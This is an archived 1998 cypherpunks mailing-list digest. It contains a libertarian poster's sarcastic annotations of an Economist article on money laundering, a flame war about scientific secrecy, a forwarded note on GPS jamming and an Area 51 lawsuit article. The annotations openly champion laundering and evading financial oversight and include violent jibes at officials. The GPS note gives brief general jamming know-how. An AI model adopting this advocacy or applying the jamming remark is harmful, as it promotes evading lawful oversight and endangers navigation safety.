plastic that slips you 10,000,000 Bongonian bellylints in exchange for 10 
euros is also a deputized collectivist agent/informant.]

D Financial institutions and employees who provide otherwise confidential
data to investigators pursuing authorized investigations are protected from
prosecution.
[Communese translation:
Deputized Government Agents/Informants (that is, anyone with whom you 
exchange legal tender bank notes, a.k.a. "dirty" money) who provide 
"otherwise confidential" data so that "authorized investigators" may empty
your bank account are not accomplices to looters with sovereign immunity.]

Source: US Department of State (International Narcotics Control Strategy
Report)

[Source: Illegitimate Spawn of Hegel (Global Currency Confiscation Strategy
Report)]

[Notice again that the less fiscally totalitarian states are those actively
engaged in recalling their worthless currencies, forbidding (in theory) 
their domestic hostages from sending capital abroad, forbidding (in theory) 
holding gold or using other means of protection from criminal governments, 
defaulting on foreign loans and various shenanigans in a similar vein. From
this it can be concluded that for those on the outside looking in, chronic 
economic mismanagement and chaos are not necessarily a negative, these areas 
provide excellent entry points in the "rewire-chain"...]

In the future, more Asian countries could be added to the list. Rick 
McDonell [, looter ], the FATF's representative [of Satan] in Asia, warns 
that the region is ["]vulnerable["] to laundering because many of its 
economies are heavily cash-based. [Solution: go hire Jerry Seinfeld, Patrick 
Stewart and all the other convenience-card whores to shill for the cashless
society in Bangkok, Guangzhou and Kuala Lumpur?] Moreover, some countries 
such as India and Pakistan have large "underground" banking systems which 
sit alongside official ones [hawala]. Usually based on family or regional 
networks, these shift large amounts of money [and other stored units of 
value, e.g. crates of Avtomat Kalashnikova, "illegal" cash crops, RPGs, 
precious stones] around anonymously and cheaply. [25-28% markup indeed! 
Forget that rubbish] Such attractions, plus a lack of anti-laundering 
legislation, have already turned Thailand into a launderers' paradise. A 
report published last year [yet another report, this journalist needs to get
out into the real world, hanging with fiscal bureaucrats and professors is 
stunting Anon-E-Communists' growth] by Bangkok's Chulalongkorn University 
put the amount of money washing through the country each year at 730 billion
baht ($28.5 billion). This is equivalent to 15% of Thai GDP.

[In future watch for the following commercials to be run in these
vulnerable-to-laundering cash-based-economy television markets:
(Jackie Chan dubbed in various local dialects)
	Amarakan Sexpress - don weave shantytown witoutit
	VIZA - accep at FinSEN office wowide
	MassaCard - it's swave money]

> E-Communist
> 25 St James's Street
> London SW1A 1HG
> www.economist.com


Fly low


S'n'S

Pro: Money Laundering, Self-Medication, Militia-Grade Arms, Realism
Pro: Indirect Taxation, Adults, Individual Irrevocable Rights
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal@edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
Anti: feral guVermin, Vooters, rapacious tyrants, nihilists
Anti: biometric herd management, "(The)" children, state granted privileges






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Jan 1998 07:07:49 +0800
To: Tim May <tcmay@got.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102800b0db4767dae7@[207.167.93.63]>
Message-ID: <199801102300.PAA06067@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




[scientists]
>"Name me one..."? How about Gauss, who didn't publish many of his results.
>Or, of course, Fermat, ironically linked to Wiles.

the mathematical establishment does not look with favor on Gauss'
secrecy. the commentary is generally that it is a shame he was
so secret and lost credit for his accomplishments. by the way,
I don't agree that publishing is merely about getting credit, although
because humans are egotistical, that can be a powerful motivator.

as for Fermat, -- I find it interesting you are now mentioning various
mathematicians; have never heard you refer to them. Fermat sent letters
to many of the great mathematicians of his time, and wouldn't even
be known if it weren't for his challenges. his famous theorem was
published by his *son* and this amazing gem came close to being
lost in all obscurity.

>Not to mention Darwin, who sat on his results for almost 20 years, and only
>issued a paper and his famed book because he learned another naturalist was
>about to announce similar conclusions.

in every case you cite, these people eventually published, and 
science is mostly aware of only their published results. agreed, 
science does not require that people publish immediately or even
in their own lifetime. it does demand that they eventually publish.
there are many informative episodes in which people who discovered
various scientific principles failed to convey them, or weren't
interested in it, and they had to be rediscovered by other 
scientists. these scientists advanced the knowledge by themselves
publishing.

science as a way of dealing with data can be practiced in private.
this is a feeble form.  science in its most potent form,
as the *advancement of the human condition* can only be
practiced in public.

>Publication and, more importantly, discussion and challenge, is often very
>important to the advancement of science. But is some cast in stone
>requirement? Of course not.

bzzzzzzzt. science atrophies without it. it is crucial to science.
it is central to it. but I don't wish to be considered an authority
on science or a defender of it. it has serious deficiencies as
practiced today.

>Building an artifact which embodies the science, for example. Exploding an
>atom bomb was pretty clearly a demonstration that the science done was
>correct, regardless of whether there was "open literature" or not.

you refer to science in a narrow sense of merely constructing things.
this is not the sense of science that is of crucial importance to
humanity as a whole. the atom bomb was in some ways a serious regression
of the collective human condition.

this is all so easy, refuting Timmy's feeble grasp of science, that
I might soon quit. unless I get the sense (which I have a finely honed
detector) that his veins are popping,
in which case I'll post a few treatises on the subject.

p.s.
>>I will post soon the list an article demonstrating my
>>anger at the betrayal of sound government by a sinister state
>>that has hijacked it.
>
>Have they begun torturing you with the snakes of Medusa yet?
>

hee, hee.
there are many more snakes and conspiracies 
in politics than there are in all of cyberspace. 
I've set my sights higher than nailing lame
conspiracist wannabes on an obscure mailing list degenerating
into the total noise it was always destined for. 
there are some people that are not
merely traitors to their government or various ideals, but
to the whole human race. but I'm the first to give credit
where it is due. I have always thanked all my enemies
profusely for expanding my horizons.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Jan 1998 08:21:40 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.32.19980108220504.00707df8@cnw.com>
Message-ID: <199801110017.QAA10591@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>BTW, you should consider that when Einstein proposed the creation of a
>bomb, it was within the context of a war being advanced globally by an evil
>madman who was gathering every resource to subdue and decimate everything
>in his way, and that the rest of the world was desperate for a solution.

uh huh, and we stopped him by ... bombing hiroshima AND nagasaki?
I think there are greater madmen in the world than their poster
boy Hitler who financed his rise....

>Also you should remember that some brilliant people, like Newton, who was a
>shy man and didn't necessarily see himself as others did/do, did not care
>if anyone else saw the results of his work.

bzzzzzzzzzzt, he eventually published at the urging of his friend Halley
and then got involved in bitter disputes about credit ..

  Once he had solved the
>problems in his own mind, he was not exceptionally concerned that others
>were also struggling with the same, nor whether "the community" needed the
>answer.   He was pursuing knowledge for reasons of his own. 

bzzzzzzzzt, I believe he was a member of scientific communities at the
time. he also was intensely 
involved in reforming the government monetary system. as a younger person
he was a loner, I agree.

hey everyone, go see "wag the dog" and think one nanosecond
about the world we live in and how it came to be the way
it is....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Jan 1998 08:30:08 +0800
To: Tim May <tcmay@got.net>
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <v03102801b0db59b6282a@[207.167.93.63]>
Message-ID: <199801110024.QAA10953@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>
>>Don't be confused by Timy's claim to be a scientist, he is a technologist at
>>heart. Many of his views and beliefs are motivated by issues of control *not*
>>curiosity.
>....
>>You don't know Timmy very well do you...
>
>Add Choate to the list of dimbulbs who think calling me "Timmy" (or Timy)
>is some kind of witty insult. On this list, Detweiler and Vulis seem to
>favor this usage.

an insult? quite to the contrary, I have always considered it a term 
of endearment!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Harland <foggy@gilligan.netisle.net>
Date: Sun, 11 Jan 1998 08:43:47 +0800
To: cypherpunks@toad.com
Subject: Nervous Nellies at the PO
Message-ID: <Pine.LNX.3.95.980110161843.31258A-100000@gilligan.netisle.net>
MIME-Version: 1.0
Content-Type: text/plain



                                      
Came across this by chance...having never heard of this 'disgruntled'
web site, I'm curious as to how the PO managed to learn about the
offending story...if they fired him because of an explicity fictional
article expressing a fantasy shared by vast hordes of Americans then
it kind of looks like the Post Office 'went postal' on one of their
employees.

>   DISGRUNTLED POSTAL WORKER
>   
>   A South Bay postal worker has been fired for a fictional article he
>   got published on the Internet, in which he depicted a worker who was
>   so fed up with conditions in his San Jose office that he pulled out a
>   gun and shot his dictatorial and much despised supervisor. The article
>   appeared in December in the on-line publication Disgruntled, which
>   bills itself as the business magazine for people who work for a
>   living.
>   
>   The story, "Scrooged Again," appeared to have struck a nerve with his
>   employer, who informed him that he would be removed from his job at
>   the postal service effective Jan. 27 because of "unacceptable and
>   disrespectful conduct."
>   
>   The Web page site for Disgruntled is: http://www.disgruntled.com
>   

-----------------------------------------------------------------
foggy@netisle.net                  lat:47d36'32" long:122d20'12"
"Rather perish than hate and fear, and twice rather perish than
make oneself hated and feared."                    -F. Nietzche-
-----------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 11 Jan 1998 08:54:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102800b0db4767dae7@[207.167.93.63]>
Message-ID: <v03102802b0ddc3eab7fa@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:00 PM -0800 1/10/98, Vladimir Z. Nuri wrote:
>[scientists]
>>"Name me one..."? How about Gauss, who didn't publish many of his results.
>>Or, of course, Fermat, ironically linked to Wiles.
>
>the mathematical establishment does not look with favor on Gauss'
>secrecy. the commentary is generally that it is a shame he was

Doesn't matter how the establishment (whatever that might be) looked on him
or not...you challenged me to name _one_ example, and I named several. Oh,
and it is not true as you later claim that all of my examples "eventually
published" all of their findings. Fermat did not, Gauss did not.

My main point has been to refute your notion that any one who elects not to
publish in the open literature cannot be a scientist. I know of many
scientists who could not publish, or chose not to for various reasons.

I mentioned the Manhattan Project scientists. (Choate made some bizarre
claim after this mention that all of the science was known in the 20 and
30s, and that no actual science was done by MP "engineers" and
"technicians." Might be a surprise to Ulam, Teller, von Neumann, and all
the others who worked in secrecy on the atom bomb, then the hydrogen bomb,
and so on.)

Oh, and what of all the many fine Russian scientists of this century,
nearly all restricted in what they could publish? Because they could not
submit their work to open publication were they not doing science?

The point being that open publication is only a part of the methodology of
doing science, and a fairly recent one, too.

>as for Fermat, -- I find it interesting you are now mentioning various
>mathematicians; have never heard you refer to them. Fermat sent letters

I know Detweiler that you hang on my every word, compiling indices of what
I and my tentacles have been beaming out to you, but I don't track such
trivia about whether or not I have ever mentioned mathematicians. I would
asssume I have, as I recall discussing von Neumann, Hadamard, and other
mathematicians over the years.

But I'll leave it to you to search the archives over the past 5 years....

>hee, hee.
>there are many more snakes and conspiracies
>in politics than there are in all of cyberspace.

You ought to know.

--Tim May and his Tentacles

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 11 Jan 1998 00:45:24 +0800
To: cypherpunks@Algebra.COM
Subject: Surprise - Anonymous Journalist Opposes Laundering [3/4]
Message-ID: <199801101640.RAA00139@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



	Part 3 "Our Enemy: the Journalist" [3/4]

				[3/4]
Whitewash	[The Predictable Agenda Revealed]
All these developments suggest that the world's existing ["]defences["]
against ["]dirty["] money are ["]inadequate["]. [And we all know what their
definition of "adequate" would be.] [*]Banking secrecy is a serious 
problem[*]. As the table shows, bankers in a number of "high-priority"
centres can still be prosecuted [heaven forbid!] if they hand over
confidential information to officials investigating laundering cases.

[So, absent probable cause that a _real_ crime has been committed, 
"officials" must be allowed to engage in fishing expeditions without
repercussion.
Therefore, we must give these "officials" carte blanche access to:
   1) private (actually public) bank data.
   2) safe deposit boxes (send a spare key to FATF when you rent a box).
   3) private records (unrecoverable encryption made a felony).
   4) physical warrantless searches of "suspected currency smugglers"
	(on the spot or no-knock).
Carte Blanche access is the ultimate goal.
All done "confidentially" you understand. I won't tell the victim if you 
don't. And people would wonder why I don't have a domestic bank account.]

It also shows that several of these centres have yet to extend their
anti-laundering regimes to cover non-bank financial institutions. [the 
operative word being _yet_.] No wonder some financial poLiceman claim they
are being asked to fight laundrymen with one hand tied behind their backs. 
[a straightjacket and possibly rope + oak tree would be appropriate <g>]

As if that were not bad [good] enough, the current approach to tackling the
[non-]problem of onshore and offshore laundering havens is flawed, too. The
FATF has done some useful work, [like what exactly?] but it has not been
tough enough with slowcoaches. It only censured Turkey several years after
it became a member. [Turkey should tell this ATF to go take a flying leap]
And it has yet to take action against Austria, another member, which still
has anonymous savings accounts [which due to their membership in the 
reconstituted Holy Roman Empire they will eventually sell out or at best
phase out with grandfather clauses] for its citizens [and many non-citizens 
as well, leave our Sparbuchen alone thank you very much] despite an FATF
[*]edict[*] banning anonymity.

[A most curious use of language: "despite an edict banning anonymity". And 
just who is it that supposedly granted FATF the authority to issue _edicts_
(as in dictate, force, coerce) or _ban_ a single goddamn thing?! 

Apparently a collective "hive" of enthroned, unaccountable, power-usurping 
bureaucrats are justifying their existence by rendering decisions "for" the
little people and sees itself fit to spew forth proclamations unbeknownst to
many under imaginary authority it has granted unto itself. How very regal of
them.

Is said edict (banning anon accounts) an example of the "useful work" this 
_anonymous_ journalist refers to? The irony is delicious. Does this 
represent the type of government-by-edict rule that he/she/it finds so 
agreeable? Perhaps she-he-it spends too much time attending WTO meetings and
schmoozing with those-who-know-better to discuss the latest nuances of
negotiated edict proclamations. 

You (anonymous, E-Communist writer) need to get out more, buckwheat.
How about putting this edict thingy up for a vote of the Austrian people?
An antiquated idea I realize but it would give you and your associates an
opportunity to further propagandize the great unwashed to the cause of
Total State Control.

OTOH, then these aspiring fiscal tyrants would have to crawl out of their
committee meetings and explain to the rabble why it is so urgent that 
private banking be abolished (confidentially, of course).

Besides which, owners of anonymous accounts like them just the way they are
and would find another way to keep their property out of your greedy little
paws regardless (even if you did somehow manage to convince 50.0001% of the
vooters to help you fight non-crime. "We" don't have to show you no 
steeenkin' passport).]

Some anti-laundering campaigners say that criticism of members in evaluation
reports is often watered down for diplomatic reasons [how can an evaluation
be watered down when it starts with zero substance?]. "Every report was put
through so many whitewashes", complains Sue Thornhill, [parasite, ] a 
consultant on laundering to the British Bankers Association. The FATF's fans
[such as they are outside the GovernMedia sphere of influence] admit that 
some plea-bargaining goes on, but insist that it does not let countries off 
lightly. 
[What is this utter nonsense: 
	"plea-bargaining" (?)
	"does not let countries off lightly" (?)
Are representatives of "guilty" nations hauled off to some FATF Star Chamber
and forced to perform lewd acts with smart cards?!?]

Whatever the truth, [the truth being that money laundering is not a crime;
acknowledgment of which would run counter to your basic philosophical 
premise and thus be dismissed as extremist libertarian kookery] there is an
even bigger problem with the task force's approach [the problem is the 
existence of FATF and other agencies of its ilk]. Every time it persuades 
a financial centre [against it's best interests] to crack down on 
laundering, crooks will move to new ones [as would any normal person who
places a value on customer service]. As the amount of money that comes with
them grows, so the incentive for these other havens to change their ways 
will dimish. [until they become fat and happy like Helvetia, then they begin
to evidence a strange desire to look 'respectable' in front of the 'world 
community' and now readily strap on the knee-pads for their pimp: the United
States] The FATF seems to be hoping that peer-group pressure is the 
solution. [Oh yeah? Just because your friends have abolished (de facto) bank
secrecy and have ceased jailing informants and foreign moles does that mean
you're going to do it as well? What would your mother say about that?] It 
has set up a regional Caribbean task [tax] force and is ["]supporting["] the
creation of an Asia-Pacific anti-laundering group. [picture an enterprising
cretin at FATF calling some string-puller over at the IMF: 'Tell them to 
give us all the access we want to foreign account holder data or else no 
more taxpayer coerced bailout for you Asians'...] But even if this attempt 
to sign up new members works, such an approach will take a long time. And 
there is a danger that many members will sign up to get the FATF's badge of 
respectability [and the cushy do-nothing jobs that go along with it for 
political hacks and career bureaucrats], and then drag their feet over 
implementing its recommendations. [confusing, are they _edicts_ or 
_recommendations_ ?]

So are economic sanctions against refuseniks the answer? The sort of
"economic warfare" envisaged by Senator Kerry is not. Banning 
citizen[-hostage]s of a few rich countries from dealing with known
laundromats would hurt legitimate businesses, while crafty launderers would
find ways round the restrictions. 
[Senator Kerry, (Looter-Taxachusetts): "Yeah right, that's a wimpy 
apologetic journalist pretending to present both sides of an issue, let's 
get real here, no _legitimate_ business would need to have an Aruban
bank account when our local S&L offers backup withholding, full disclosure 
on request to any and all government employees, demands for SSN's and 
fingerprints, deposit insurance and CTRs, in short all the protection and 
benefits the surveillance state has to offer. So those who have the mistaken
notion that all assets DO NOT belong to the state and DO NOT submit to the 
fact that those assets they are trying to keep from our grasp belong TO US 
and are only on temporary loan to individual shee, um, people need to be set
straight and made an example of. I say we must pull another Panama and 
invade these small narco-terrorist haven countries and shut all their banks
down permanently. If citizens of these pathetic excuses for states want a 
bank account, our good Bwoston banks are more than happy to serve them."]
That leaves Mr Tanzi's proposed strategy as the only current proposal with 
something to recommend it. Of course, getting an international agreement on
minimum anti-laundering standards will not be an easy task. But it is worth
a try. For without a concerted global response [= global surveillance of 
every transaction = dictatorial global bureaucracies] to the problem of 
["]dirty["] money, the world's money-laundering machine will be off on yet 
another devastating [to whom?] cycle.

[Summary:
Banking secrecy is a serious problem.
Unreported asset possession is a serious problem.
Non-governmental ComSec is a serious problem.
Non-intelligence-agency laundering is a serious problem.
Anonymous ownership transfers are a serious problem.
Unreported cash transactions are a serious problem.
Cash is a serious problem.
Teenage fucking is a serious problem.
Non-alcohol, non-prescription drug consumption is a serious problem.
Contraband smuggling is a serious problem.
The emerging e-cash threat is a serious problem.
Anonymous accounts are a serious problem.
Bearer shares are a serious problem.
Multiple identities are a serious problem.
Unregistered gun ownership is a serious problem.
Inadequate government staffing is a serious problem.
Inadequate international cooperation is a serious problem.
Inadequate tax revenue is a serious problem.
Freedom is a serious problem.
Unacceptable. These activities will be stopped. You will be assimilated.

These FATF swine need a good ass-kicking.]

> E-Communist
> 25 St James's Street
> London SW1A 1HG
> www.economist.com


Fly Low


S'n'S

Pro:__Money Laundering__Self Medication__Militia Grade Arms__Realism________
__Indirect Taxation___________Adults___________Individual Irrevocable Right$
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal@edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
ANTI:_feral guVermin____Vooters__________blue hellmutts______nihilists______
__biometric herd management__"(The) children"__state granted privilege_____!---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 11 Jan 1998 00:45:19 +0800
To: cypherpunks@Algebra.COM
Subject: Surprise - Anonymous Journalist Opposes Laundering [4/4]
Message-ID: <199801101641.RAA00151@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



	Part 4 "Fighting the Next War" [4/4]

				[4/4]
Next, cyberlaundering?

If there is one thing that money launderers hate it is cash; physical cash,
that is [No, we hate criminal governments who refuse to issue larger 
denomination notes]. Shipping huge wads of banknotes is a logistical 
nightmare [which would be less onerous if, by way of example, the US 
guVermin recirculated $500, $1000, $5000 and $10,000 FRNs. The printing 
plates for such "money-laundering friendly" notes having been de-activated 
since the reign of dictator Roosevelt; refusal to issue higher denomination 
FRNs to keep pace with Accumulated Wealth Tax extractions (commonly referred
to as "inflation") since the 1930s is nothing less than slow-motion, 
backdoor currency recall]. It also raises the risk that couriers will be 
intercepted [they mean robbed] and the ["]loot["] traced back to its source.
Transferring money electronically is both quicker and easier [but not 
necessarily safer in certain nations]. [*]Hence concerns in law-enforcement 
circles that new forms of electronic money could render obsolete traditional
methods of tracking ["]tainted["] money, which rely heavily on the poLicing
of bank transactions[*]. 

["Hence concerns in law-evasion circles that new forms of vooter sanity 
threatening to outlaw drug Prohibition could render obsolete traditional 
streams of tax-free income."]

["Hence concerns in law-enforcement circles that new forms of vooter sanity 
threatening to outlaw drug Prohibition could render obsolete traditional 
pretexts for increased budgets, privacy deprivation and sheeple tracking."]

Electronic-money systems come in three different forms. There are 
stored-value cards, which allow customers to load money onto a 
microchip-bearing piece of plastic. This can then be carried around like a 
credit card. There are computer-based systems, for example, those involving
payments over the Internet. and there is talk of hybrid systems, which allow
smart cards and network-based payments to work together.

Although these new gizmos are still under development, financial regulators
and policemen have been studying them intently. And they have raised several
questions to which they want answers. One is whether limits will be placed
on value that can be held on chip-bearing cards. A card without a limit
"could break my back", [then there would be no need for a tree] worries 
Stanley Morris, [the anti-christ, ] who heads FINCEN, the American 
government's financial-intelligence unit [FiU]. He thinks launderers could 
use it to shift millions of dollars on a piece of plastic.

The anti-laundering brigade [brigands?!] also wants reassurance that crooks
will not be able to set themselves up as e-money issuers. [I guess as 
opposed to the crooks who set themselves up as fiat banknote issuers] And 
they want to know whether all transactions in whatever system will be logged
at a central point, so that investigators can reconstruct an [unencrypted??]
electronic audit trail ["]if necessary["]. [B.S., they don't "want 
reassurance" or "want to know" squat, this is their non-negotiable DEMAND; 
they will try to rob, kidnap, jail, and murder anyone who thinks different] 
At least one card-based system currently being developed by Mondex, a 
company owned by Master-Card, [MassaCard] is designed to allow money to be
transferred directly between cards, without leaving such a trail. DigiCash,
which is developing a computer-based payment system, is using what it calls
a "one-way privacy" method, which allows payers to check who received money
from them, but does not allow the recipients to find out where it came from.
[as in a postal money order (but sans the silly $700 per m.o. limit and the
ridiculous $2999.99 daily limit) sent to a payee anonymously]

While these and other issues, such as who will have jurisdiction over
laundering on the Internet, [I smell a brand new Global Bureaucracy in the 
air] suggest the new systems could cause the authorities a few headaches,
some experts beg to differ. A report published last year by the Bank for
International Settlements, [another report cited, another worthle$$ 
bureaucracy, amazing isn't it?] the central bankers' central bank, [in other
words, a den of iniquity] noted that in most cases, measures designed to
protect the new systems against fraud--such as attaching unique electronic
serial numbers to transactions--would make them less attractive for criminal
activities than many existing payment systems. At the moment, all financial
regulators can do is watch and wait.

> E-Communist
> 25 St James's Street
> London SW1A 1HG
> www.economist.com

[Remember if you do your banking in a socialist country, there are three
parties involved in any transaction:
	1) you, the presumed criminal.
	2) the (non-)bank employee, snitch/narc/mind-reader.
	3) the guVermin employee, looter/thief/spy.]

Fly Low


S'n'S

Pro: Money Laundering, Self-Medication, Militia-Grade Arms, Realism
Pro: Indirect Taxation, Adults, Individual Irrevocable Rights
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal@edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
Anti: feral guVermin, Vooters, rapacious tyrants, nihilists
Anti: biometric herd management, "(The)" children, state granted privileges






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Mon, 12 Jan 1998 07:15:32 +0800
To: cypherpunks@cyberpass.net
Subject: GPS Jamming [FWD]
Message-ID: <v03102800b0dddb42d6f8@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



I think this might have been mentioned in a CP thread sometime back.  At least it should have ;-)

---------------

Date: Fri, 9 Jan 1998 22:29:14 +0000
From: "Marcus L. Rowland" <mrowland@ffutures.demon.co.uk>
Subject: GPS Jamming

*New Scientist* (8 Jan 1998, http://www.newscientist.com) included an
article saying that a Russian company called Aviaconversia was offering a
4-watt GPS/Glonass jammer for less than $4000 at the September Moscow Air
Show. It says that it could stop civilian aircraft locking onto GPS signals
over a 200 Km radius; military aircraft would be harder to jam, but a more
powerful unit could be built.

The risks (terrorism etc.) are fairly obvious, and it's mentioned that it
would probably be easy to build one even if this company's product is
somehow removed from the market.

Marcus L. Rowland  http://www.ffutures.demon.co.uk/

-------------

GPS uses a wideband Direct Sequence Spread Rectum technology.  DSSS, as implemented in GSP, is excellent for distance an direction finding due to its inherent, very accurate, time base.  In order to conserve satellite power and provide a reasonable signal level at small (e.g., handheld) receivers, it spreads a low data rate signal over wide band, achieving a 63dB 'process gain' (equivalent to about a 2 million fold increase in receive signal level).  DSSS signals (in general) can be jammed by very narrow (e.g., CW or continuous wave) carriers, especially pulsed, with relatively modest power.  GPS includes significant provisions for anti-jam and although I haven't done a detailed analysis, I'd be surprised if a 4-watt transmitter would render a 200 km radius unfit for GPS navigation.

See "Spread Spectrum  Communications Handbook," ISBN 0-07-057629-7.

--Steve

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------
Steve Schear              | tel: (702) 658-2654
CEO                       | fax: (702) 658-2673
Lammar Laboratories       |
7075 West Gowan Road      |
Suite 2148                |
Las Vegas, NV 89129       | Internet: schear@lvdi.net
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Jan 1998 11:03:19 +0800
To: cypherpunks@Algebra.COM
Subject: area 51, enviro crime, secrecy==abuse?
Message-ID: <199801110257.SAA20519@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain





Environment of Secrecy

A lawsuit alleges environmental crimes
at the country's most secret military base    

Amicus Journal, Spring 1997,
a publication of the National 
Resources Defense Council

by Malcom Howard
    
    August, 1994: Standing atop a
    desert ridge in central Nevada,
    Glenn Campbell peers through
    binoculars at a remote duster of
    buildings in the valley below. "It's
    the most famous secret
    militaryfacility in the world," he
    says. The scattering of airplane
    hangars and radar dishes below,
    barely visible through the haze, is a
    secluded Air Force test facility
    known as Area 51-- or, more
    fancifully, "Dreamland"-- that is
    believed to have launched the most
    sophisticated Cold War aircraft,
    from supersonic spy planes to the
    radar-evading Stealth bomber.
    
    Campbell has made a mini-industry 
    of showing off this
    clandestine outpost, built on a
    barren pancake of alkali just inside
    the Air Force's restricted Nellis
    Gunnery Range north of Las Vegas.
    His self-published tour book
    describes how to get a stealthy,
    yet fully legal, view of Area 51.
    Tourists pass electronic sensors on
    the road and watch helicopters
    patrol above, and are tailed by men
    in unmarked white jeeps
    who train high-powered video
    cameras on their every move. Though
    Campbell's tour stays entirely on
    public land, once on the ridge his
    clients stand only yards from the
    Area 51 boundary. Signs
    prohibiting photography and warn
    that "use of deadlyforce" is
    authorized against trespassers.
    
    These days, Glenn Campbell's
    not-for-profit tour business
    has fallen on hard times. In
    1995, the Air Force all but
    shut him down: it seized the
    4,500 acres of public land where
    Campbell's customers used to get
    their best views. The move
    demonstrates just how touchy the Air
    Force is about this military sanctum
    sanctorum-- since, in order to close
    out a few ragtag sightseers, it
    inevitably whipped up a storm of
    speculation among the conspiracy
    buffs, tabloid press, UFO trackers,
    aviation hounds, and government
    accountability activists who are
    fascinated by Dreamland.
    
    One can only imagine, then, the
    consternation in the upper ranks of
    the Air Force when four former Area
    51 employees and widows of two
    others brought their now celebrated
    lawsuit, alleging that the secrecy
    surrounding the site had been used
    to commit and then cover up
    environmental crimes.
    
    "My husband came home one day
    screaming," says Helen Frost, whose
    late husband, Robert, was a sheet-
    metal worker at Area 51. "He was
    screaming, 'My face is on fire.' His
    face was bright red and swollen up
    like a basketball. Then he got three-
    inch scars on his back. A year later,
    he died." In 1990, the year after
    Frost's death, a posthumous worker's
    compensation hearing found that the
    liver disease that killed him stemmed
    from heavy drinking, not toxic
    industrial chemicals. But Helen Frost
    disputes that finding. She points to
    testimony from a Rutgers University
    chemist who found high levels of
    dioxins and dibenzofurans in her
    husband's tissue. Those extremely
    dangerous chemicals, wrote Dr. Peter
    Kahn-- best known for his role in the
    Agent Orange commission-- were
    likely the result of industrial
    exposure.
    
    Helen Frost and her co-plaintiffs
    filed the original lawsuit in 1994,
    alleging that the military and its
    contractors regularly and
    illegally burned huge volumes of toxic
    waste in the desert, exposing workers
    to dangerous fumes. Defense
    contractors from the Los Angeles
    area, they claimed, routinely trucked
    55-gallon drums full of paints and solvents
    into Area 51. Employees would dig
    large trenches, toss in the drums,
    spray on jet fuel, and finally light the
    toxic soup with a flare.
    
    The plaintiffs named the
    Department of Defense, the National
    Security Agency, and the Air Force
    in the suit, charging that they
    allowed the burning in violation of
    the Resource Conservation and
    Recovery Act (RCRA), the nation's
    keystone hazardous waste law. In a
    parallel suit, they charged the
    Environmental Protection Agency
    (EPA) with failing to inspect and
    monitor waste disposal at the facility,
    as RCRA requires. The plaintiffs have
    said that many other Area 51 workers
    are suffering from ailments similar to
    Frost's. They do not seek
    damages-- just information about
    what chemicals they were exposed
    to, help with their medical bills, and
    an end to the burning.
    
    The extreme secrecy shrouding Area
    51 has turned the lawsuit into
    something out of a Cold War spy
    novel, replete with sealed motions,
    confidential hearings, blacked-out
    docket sheets, and classified
    briefings. "We're in the rather
    unenviable position of suing a facility
    that doesn't exist, on behalf of
    workers who don't officially exist,"
    says Jonathan Turley, the George
    Washington University law professor
    who is representing the plaintiffs.
    
    The existence of the workers is
    fairly straightforward: because they
    took secrecy oaths in order to work
    at Dreamland, they fear recrimination
    for going to court, and so the judge
    has allowed them to sue
    anonymously. But the existence of
    Area 51 is more problematic. The
    base is absent from even the most
    detailed defense flight charts. Ask
    the Air Force communications office
